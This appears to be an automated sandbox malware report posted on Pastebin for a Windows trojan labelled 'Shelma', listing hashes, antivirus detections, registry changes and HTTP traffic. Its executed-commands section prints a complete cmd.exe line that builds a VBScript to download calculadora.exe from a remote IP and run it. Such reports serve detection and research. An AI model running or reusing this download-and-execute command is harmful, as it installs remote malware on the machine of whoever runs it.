paladin316

Exes_4a379d1c072bf1bff847220bd0d89c0d_exe_2019-07-17_07_30.txt

Jul 17th, 2019
2,093
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.13 KB | None | 0 0
  1.  
  2. * MalFamily: "Shelma"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_4a379d1c072bf1bff847220bd0d89c0d.exe"
  7. * File Size: 347648
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "f615a06894da64d72b714068a862a217345a8b224aa07a2d986440674c071e91"
  10. * MD5: "4a379d1c072bf1bff847220bd0d89c0d"
  11. * SHA1: "d1688f6fd219742dddf6ccd1ebe67aeffe868689"
  12. * SHA512: "1a5119b178f94ef14ab79e7992f78fa33ab4552bfeba0a81384097454dfa0de5e79e3a0106ba7b6dee9cbe7bb7e9e512a9dc9917b4f476f60613866ffeee6fb2"
  13. * CRC32: "6E8A71E2"
  14. * SSDEEP: "6144:T1fatoNBFgU1hvH99i2fQEmvGJy7rcjZPSfgy:T1famNR99vwG+rES/"
  15.  
  16. * Process Execution:
  17. "Exes_4a379d1c072bf1bff847220bd0d89c0d.exe",
  18. "cmd.exe",
  19. "cscript.exe",
  20. "calculadora.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "cmd.exe /c \"@echo Set objXMLHTTP=CreateObject(\"MSXML2.XMLHTTP\")>poc.vbs &@echo objXMLHTTP.open \"GET\",\"http://69.64.43.224/calculadora.exe\",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject(\"ADODB.Stream\")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile \"calculadora.exe\">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject(\"WScript.Shell\")>>poc.vbs&@echo objShell.Exec(\"calculadora.exe\")>>poc.vbs&cscript.exe poc.vbs\"",
  25. "cscript.exe poc.vbs",
  26. "calculadora.exe"
  27.  
  28.  
  29. * Signatures Detected:
  30.  
  31. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  32. "Details":
  33.  
  34. "IP": "69.64.43.224:80"
  35.  
  36.  
  37. "IP": "69.64.43.224:443"
  38.  
  39.  
  40.  
  41.  
  42. "Description": "Creates RWX memory",
  43. "Details":
  44.  
  45.  
  46. "Description": "Detected script timer window indicative of sleep style evasion",
  47. "Details":
  48.  
  49. "Window": "WSH-Timer"
  50.  
  51.  
  52.  
  53.  
  54. "Description": "Reads data out of its own binary image",
  55. "Details":
  56.  
  57. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00000000, length: 0x00000040"
  58.  
  59.  
  60. "self_read": "process: cscript.exe, pid: 2400, offset: 0x000000e8, length: 0x00000018"
  61.  
  62.  
  63. "self_read": "process: cscript.exe, pid: 2400, offset: 0x000001e0, length: 0x00000078"
  64.  
  65.  
  66. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015e00, length: 0x00000020"
  67.  
  68.  
  69. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015e58, length: 0x00000018"
  70.  
  71.  
  72. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015f50, length: 0x00000018"
  73.  
  74.  
  75. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00016110, length: 0x00000010"
  76.  
  77.  
  78. "self_read": "process: cscript.exe, pid: 2400, offset: 0x00016230, length: 0x00000012"
  79.  
  80.  
  81.  
  82.  
  83. "Description": "Drops a binary and executes it",
  84. "Details":
  85.  
  86. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\calculadora.exe"
  87.  
  88.  
  89.  
  90.  
  91. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  92. "Details":
  93.  
  94. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  95.  
  96.  
  97. "suspicious_request": "http://69.64.43.224/calculadora.exe"
  98.  
  99.  
  100.  
  101.  
  102. "Description": "Performs some HTTP requests",
  103. "Details":
  104.  
  105. "url": "http://69.64.43.224/calculadora.exe"
  106.  
  107.  
  108.  
  109.  
  110. "Description": "File has been identified by 11 Antiviruses on VirusTotal as malicious",
  111. "Details":
  112.  
  113. "Kaspersky": "Trojan.Win32.Shelma.amoi"
  114.  
  115.  
  116. "Sophos": "Mal/Shellter-AC"
  117.  
  118.  
  119. "McAfee-GW-Edition": "RDN/Generic.dx"
  120.  
  121.  
  122. "Fortinet": "W32/Shelma.AC!tr"
  123.  
  124.  
  125. "ZoneAlarm": "Trojan.Win32.Shelma.amoi"
  126.  
  127.  
  128. "AhnLab-V3": "Malware/Gen.Generic.C3336226"
  129.  
  130.  
  131. "McAfee": "RDN/Generic.dx"
  132.  
  133.  
  134. "TrendMicro-HouseCall": "TROJ_GEN.R004H07GE19"
  135.  
  136.  
  137. "Tencent": "Win32.Trojan.Shelma.Pcst"
  138.  
  139.  
  140. "GData": "Win32.Trojan.Kryptik.TAYVZ7"
  141.  
  142.  
  143. "AVG": "FileRepMetagen Malware"
  144.  
  145.  
  146.  
  147.  
  148.  
  149. * Started Service:
  150.  
  151. * Mutexes:
  152. "CicLoadWinStaWinSta0",
  153. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  154. "Local\\ZonesCounterMutex",
  155. "Local\\ZoneAttributeCacheCounterMutex",
  156. "Local\\ZonesCacheCounterMutex",
  157. "Local\\ZonesLockedCacheCounterMutex"
  158.  
  159.  
  160. * Modified Files:
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\poc.vbs",
  162. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\calculadora1.exe",
  163. "C:\\Users\\user\\AppData\\Local\\Temp\\calculadora.exe"
  164.  
  165.  
  166. * Deleted Files:
  167.  
  168. * Modified Registry Keys:
  169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
  171.  
  172.  
  173. * Deleted Registry Keys:
  174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  175. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  176. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  177. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  178.  
  179.  
  180. * DNS Communications:
  181.  
  182. * Domains:
  183.  
  184. * Network Communication - ICMP:
  185.  
  186. * Network Communication - HTTP:
  187.  
  188. "count": 1,
  189. "body": "",
  190. "uri": "http://69.64.43.224/calculadora.exe",
  191. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  192. "method": "GET",
  193. "host": "69.64.43.224",
  194. "version": "1.1",
  195. "path": "/calculadora.exe",
  196. "data": "GET /calculadora.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 69.64.43.224\r\nConnection: Keep-Alive\r\n\r\n",
  197. "port": 80
  198.  
  199.  
  200.  
  201. * Network Communication - SMTP:
  202.  
  203. * Network Communication - Hosts:
  204.  
  205. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment